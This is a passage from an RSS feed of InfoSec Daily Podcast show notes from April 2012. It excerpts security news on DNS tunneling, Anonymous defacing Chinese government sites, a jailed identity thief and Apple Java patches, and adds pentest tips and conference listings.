<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Supported</span></p>
</td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Auxiliary functionality (password cracking, shell upload, remote contorl etc.)</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Supported</span></p>
</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px">&nbsp;</td>
</tr>
</tbody>
</table>
</div>
<p>
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.securityweek.com/do-you-know-what-your-dns-resolver-doing-right-now"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securityweek.com/do-you-know-what-your-dns-resolver-doing-right-now</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever heard of the domain name ziyouforever.com? As an enlightening experiment, get a hold of one of your recursive DNS server logs and see if there are machines on your network looking up hostnames on that domain right now. You might also check your web server or firewall logs to see if someone from the Internet is trying to resolve a hostname on that domain to locations on your network. Are you even able to get a hold of those logs? Are you even keeping DNS logs? If you said &ldquo;no&rdquo; or &ldquo;not easily&rdquo; you will need to get those capabilities ASAP&mdash;otherwise you&rsquo;re blind to one of the most insidious ways for hackers to interact with machines on your network unmolested and undetected.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t worry if you found that domain in your logs somewhere&mdash;at least not too much. It is widely believed that this domain name is actually part of a large network of domains and hostnames that provide &ldquo;DNS tunneling&rdquo; services to dissidents and other information seekers who live in countries that restrict their citizens Internet access. However, this &ldquo;positive&rdquo; use of the DNS to do something it was never intended for&mdash;surfing the Internet and sending messages from behind a cordoned off network&mdash;is a great example of why most enterprises are wide-open to real attacks via this little-known vector. How much of your secret information is going right out the DNS door right now? How would you even know where to look or how to detect this kind of activity in the future?</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.ibtimes.co.uk/articles/322867/20120402/anonymous-china-hundreds-government-websites-defaced.htm"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ibtimes.co.uk/articles/322867/20120402/anonymous-china-hundreds-government-websites-defaced.htm</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; </span><img height="417px;" src="https://lh5.googleusercontent.com/AZWUUXhfU73pNjsMVvpTBfexbUqMrgavnGfNwx-42utkuwFu2pfW360Pe47RKQ4qfpm3gLW4VCWqF0myedz8F7KH877FjLI44S119zOoIUulOJrMA2Y" width="576px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous China announced the attack on Friday morning, publishing on Pastebin a list of institutional websites that were about to be targeted (screengrab)</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Anonymous hacking collective has landed in China, home of some of the most tightly controlled internet access in the world, and defaced hundreds of government websites in what appears to be a massive online operation against Beijing.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous listed its intended institutional targets on</span><a href="http://pastebin.com/f7nFSFgq"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Pastebin</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and has now attacked them.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous Kroll claimed that hundreds of websites had been defaced or taken offline by the collective. &quot;</span><a href="http://twitter.com/search?q=%23China"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">#China</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: Several hundred websites</span><a href="http://twitter.com/search?q=%23defaced"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> #defaced</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">and 4659 Vhosts</span><a href="http://twitter.com/search?q=%23hacked"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> #hacked</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> by</span><a href="http://twitter.com/search?q=%23Anonymous"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> #Anonymous</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><a href="http://t.co/KXVrn2WA"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">cdcbd.gov.cn</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &amp; </span><a href="http://t.co/RufZZNQG"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">bbdj.gov.cn</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot; read the tweet.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The defaced homepages carry a statement against the Chinese government along with the traditional Anonymous banner and the generational anthem Baba O&#39;Riley by The Who played in background.&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2012/04/03/hacker-jailed-for-stealing-millions-of-banking-and-paypal-identities/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/04/03/hacker-jailed-for-stealing-millions-of-banking-and-paypal-identities/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Edward Pearson, a UK-based 23-year-old from York, had grand plans to make his fortune by stealing from individuals and companies through hacking and information-stealing malware.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Between January 1 2010 and August 30 2011, he used of malicious computer programs to get his hands on &#8211; wait for it &#8211; eight MILLION personal identities.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He used Trojans such as Zeus and SpyEye, to hunt down personal details on the internet, says the Daily Mail.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These details include stolen Paypal accounts, 2,701 bank cards, not to mention &quot;enough dates of birth, postcodes and names to fill 67,500 double-sided A4 pages,&quot; reports York newspaper The Press.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;One of his programs scanned through 200,000 accounts registered to online payment service PayPal &#8211; identifying names, passwords and current balances.&quot; according to the Daily Mail.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Luckily, Pearson got caught after only making a &pound;2,400 ($3,800 USD). The authorities estimate he could have walked away with as much as &pound;800,000 ($1.3M USD).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-637-pentestlessons-apple-java-update-sqli-tools-dns-resolvers-millions-stolen-and-anonymous-china/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3728/0/infosec-daily-podcast-episode-637.mp3" length="17351662" type="audio/mpeg" />
		<itunes:duration>0:36:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 637 for April 4, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outer[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 637 for April 4, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Pentest Lessons


Do not expect your program to work if you are coding while drinking whiskey! #whiskey_and_coding_do_not_mix


No matter how good you think you are, NEVER tell a customer that you will find ALL of their vulnerabilities or ALL of the &#34;ways in&#34;.


If you setup a &#34;special&#34; website for a phishing exercise, shut down the website once the exercise is finished.


When making social engineering pretexting calls, you should know the full names, geographic locations, and NATIVE LANGUAGES of the targets.


Pentest != (run vulnerability scanner of choice, load into Metasploit, autopwn) &#8230; And yes I know that autopwn has been deprecated  


Stories
Quick shoutout to Adrian Sanabria for updating his blog based on our discussions and questions on yesterday&#8217;s episode. Head over to his blog (http://averysawaba.blogspot.com) to read more.
&#160;
Source: &#160;http://www.macworld.com/article/1166195/apple_releases_java_security_updates.html
It&#8217;s probably safe to turn your Mac on again. Just a day after reports spread about a Java-based Trojan horse that could install itself on your Mac without requiring that you enter a password, Apple has released Java for OS X Lion 2012-001 and Java for Mac OS X 10.6 Update 7.
The updates, which are available for Mac OS X 10.6.8 Snow Leopard and 10.7.3 Lion (including both OS&#8217;s Server editions), patch multiple vulnerabilities in Java 1.6.0_29&#8212;including some that could allow malicious code to run on your Mac outside of the Java sandbox, triggered merely by your visiting a webpage containing the right nefarious code.
For full details on the update, Apple points to Oracle. &#160;The update patches no fewer than a dozen vulnerabilities, including the one exploited most recently in the newly-discovered Flashback Trojan horse variant.
&#8230;
Source: &#160;http://blog.imperva.com/2012/04/dissecting-the-sql-injection-tools-used-by-hackers.html
Recently, during a presentation to a group of security professi[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 636 &#8211; @sawaba’s Global Payment Writeup, G-Zero, Mystery Java, Hacking the Friendly Skys and Cleary in the Clink</title>
		<link>http://www.isdpodcast.com/episode-636-sawabas-global-payment-writeup-g-zero-mystery-java-hacking-the-friendly-skys-and-cleary-in-the-clink</link>
		<comments>http://www.isdpodcast.com/episode-636-sawabas-global-payment-writeup-g-zero-mystery-java-hacking-the-friendly-skys-and-cleary-in-the-clink#comments</comments>
		<pubDate>Wed, 04 Apr 2012 00:42:40 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3726</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 636 for April 3, 2012. Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, and Themson Mester. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 When: [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.04700422671574811" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 636 for April 3, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Karthik Rangarajan, Boris Sverdlik, and Themson Mester.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
